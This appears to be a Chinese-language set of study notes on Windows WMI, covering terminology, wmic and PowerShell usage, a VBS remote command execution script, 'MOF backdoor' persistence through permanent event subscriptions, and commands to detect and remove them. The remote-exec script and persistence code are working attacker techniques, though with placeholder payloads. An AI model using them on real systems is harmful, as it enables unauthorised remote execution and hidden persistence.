WMI 管理规范

术语

  • CIM - Common Information Model – this is the premier concept of WBEM by this model WMI stores the Managed objects data (namespace, classes, methods, properties etc.).
  • CIM Repository – This is the storage that holds the Managed objects data. The structure of the CIM repository is build upon the DMTF.
  • CIMOM - Common Information Model object manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes..
  • DMTF - Distributed Management Task Force – The DMTF consortium was founded in May of 1992. This initiative was conceived and created by eight companies like: BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. etc. The aims of this consortium are to define industry standards for management.
  • MIB – Management Information Base describes a set of managed objects. Each managed object in a MIB has a unique identifier.
  • MOF - Managed Object Format. This text file includes the class definition of on or more managed object. You can export and import this definition from the CIM repository by using the WMI CIM Studio.
  • Schema - a group of classes that describe a particular management environment.
  • SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is a part of TCP/IP suite of protocols. SNMP is the protocol by which managed information is travel between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).
  • WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment.

协议

DCOM TCP Port 135
WinRM TCP Ports 5985 (HTTP) and 5986 (HTTPS).
服务 Winmgmt

测试工具

  • wmic.exe
  • wbemtest.exe
  • winrm.exe
  • CIM Studio
  • Powershell

WMIC

列出进程

1
wmic process list brief

创建进程

1
2
wmic process call create "notepad.exe"
wmic /node:"hostname" /user:"domain\administrator" /password:"123456" process get name,processid

结束程序

1
wmic process where name="qq.exe" call terminate

启动服务

1
wmic SERVICE where name="tlntsvr" call startservice

计划任务

1
wmic job

Powershell

1
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

//-Cre 为创建好的登陆凭据

1
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe' -ComputerName 192.168.6.2 -Credential domain\administrator

WQL

1
2
3
SELECT * FROM Win32_ComputerSystem WHERE NumberOfLogicalProcessors < 2  
SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2  
SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2

WSH

REMOTE COMMAND EXEC

有时候低权限用户无法初始化wmic命令行程序,但vbs却能访问wmi接口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
'VBS
' remote command exec
' cscript wmiexec.vbs 192.168.6.2 domain\administrator 123456 "cmd.exe /c net user > c:\11.txt"
On Error GoTo 0
Dim strComputer
Dim strUser
Dim strPassword
Dim strCommand
Set objArgs = WScript.Arguments
strComputer = objArgs(0)
strUser = objArgs(1)
strPassword = objArgs(2)
strCommand = objArgs(3)
Set objWMIService = CreateObject("WbemScripting.SWbemLocator").ConnectServer(strComputer,"root/cimv2",strUser,strPassword)
' Create process
Set process = objWMIService.Get("Win32_Process")
intReturn = process.Create(strCommand)
If intReturn <>0 then
	WScript.Echo "Return value: " & intReturn
	WScript.Echo "Access denied (2)" &vbLf & _
	"Insufficient privilege (3)" &vbLf & _
	"Unknown failure (8)" &vbLf & _
	"Path not found (9)" &vbLf & _
	"Invalid parameter (21)" &vbLf & _
	"Other (22-4294967295)"
Else
	Wscript.Echo "Process created."
End If

MOF 后门

Managed Object Format (MOF)是WMI数据库中类和类实例的原始保存形式

动态创建 WMI 类

1
2
3
4
5
$StaticClass=New-ObjectManagement.ManagementClass('root\cimv2',$null,$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty',"This is not the malware you're looking for")
$StaticClass.Put()

创建永久事件订阅

  1. Event Filters 事件筛选器 -筛选出感兴趣的事件

  2. Event Consumers 事件消费者 -要在事件被触发时执行的操作 

    1
    2
    3
    4
    5
    6
      __EventConsumer  
    LogFileEventConsumer - 将事件数据写入到指定的日志文件  
    ActiveScriptEventConsumer - 执行嵌入的 VBScript 或 JScript 脚本  
    payloadNTEventLogEventConsumer - 创建一个包含事件数据的事件日志条目  
    SMTPEventConsumer - 发送一封包含事件数据的电子邮件  
    CommandLineEventConsumer - 执行一个命令行程序

  3. Binding -绑定筛选器到消费者
    __FilterToConsumerBinding

事件类型

内部事件
内部事件表示的是创建、修改和删除任何 WMI 类,对象或命名空间的事件。常以两个下划线开头。有可能错过事件,所以必须在 WQL 查询语句的 WITHIN 子句中指定事件轮询间隔。
__InstanceCreationEvent

外部事件
WMI外部事件较少,事件发生时立刻被触发。
ROOT\CIMV2:Win32_OperatingSystem

使用外部的 Win32_ProcessStartTrace 事件作为创建 LogonUI.exe 的触发器,可在用户登录的时候执行特定脚本或程序。

test.mof

https://www.codeproject.com/articles/27914/wmi-mof-basics

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Consumer
{
    Name = "WMI_Mofbackdoor_Test_CL";
    RunInteractively=false;
    CommandLineTemplate="calc.exe";
};
instance of __EventFilter as $EventFilter
{
    Name = "WMI_Mofbackdoor_Test_EF";
    EventNamespace = "Root\\Cimv2";
    Query ="SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa \"Win32_Process\" And Targetinstance.Name = \"notepad.exe\" ";
    QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding {
    Filter = $EventFilter;
    Consumer = $Consumer;
};

编译
mofcomp.exe –autorecover test.mof

mofcomp -N //[machinename]/root/subscription test.mof

或者
拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹,会自动编译执行

PowerShell

• Get-WmiObject
• Get-CimAssociatedInstance
• Get-CimClass - Powershell 3.0 CmdLet
• Get-CimInstance
• Get-CimSession
• Set-WmiInstance
• Set-CimInstance
• Invoke-WmiMethod
• Invoke-CimMethod
• New-CimInstance
• New-CimSession
• New-CimSessionOption
• Register-CimIndicationEvent
• Register-WmiEvent
• Remove-CimInstance
• Remove-WmiObject
• Remove-CimSession

创建开机启动事件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$filterName='BotFilter82'
$consumerName='BotConsumer23'
$exePath='C:\MyProg.exe'
#创建一个__EventFilter
$Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
$WMIEventFilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{
Name=$filterName;
EventNameSpace="root\cimv2";
QueryLanguage="WQL";
Query=$Query} -ErrorAction Stop
#创建一个CommandLineEventConsumer
$WMIEventConsumer=Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{
Name=$consumerName;
ExecutablePath=$exePath;
CommandLineTemplate=$exePath}
#用于绑定filter和consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{
Filter=$WMIEventFilter;
Consumer=$WMIEventConsumer
}

检测

wmi有时候被恶意软件用来修改浏览器主页

查看过滤器,消费者,绑定

PowerShell

1
2
3
4
5
6
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

使用 wmic

wmic /namespace:\root\subscription PATH EventConsumer get/format:list
wmic /namespace:\root\subscription PATH EventFilter get/format:list
wmic /namespace:\root\subscription PATH FilterToConsumerBinding get/ format:list
wmic /namespace:\root\subscription PATH TimerInstruction get/format:list

清除

Powershell

1
2
3
4
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='filtP1'" | Remove-WmiObject -Verbose    
Get-WmiObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='consP1'" | Remove-WmiObject -Verbose    
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

使用 wmic

wmic /namespace:\root\subscription PATH EventConsumer delete
wmic /namespace:\root\subscription PATH EventFilter delete
wmic /namespace:\root\subscription PATH FilterToConsumerBinding delete
wmic /namespace:\root\subscription PATH TimerInstruction delete

WMI Providers

https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers

安装提供程序
Installutil.exe WMIServiceHost.dll

wmic PATH win32_servicehost

错误处理

注册dll

1
regasm %systemdrive%\program files\reference assemblies\microsoft\framework\v3.5\system.management.instrumentation.dll

架构

namespaces, classes, and objects

持久性对象存储在位于 %SystemRoot%\System32\wbem\Repository\ 的 CIM 数据库中,它存储着 WMI 类的实例,类的定义和命名空间的定义。

Note
1,CIM 数据库可存储任意数据
2,作为C2通道传输数据
3,创建提供程序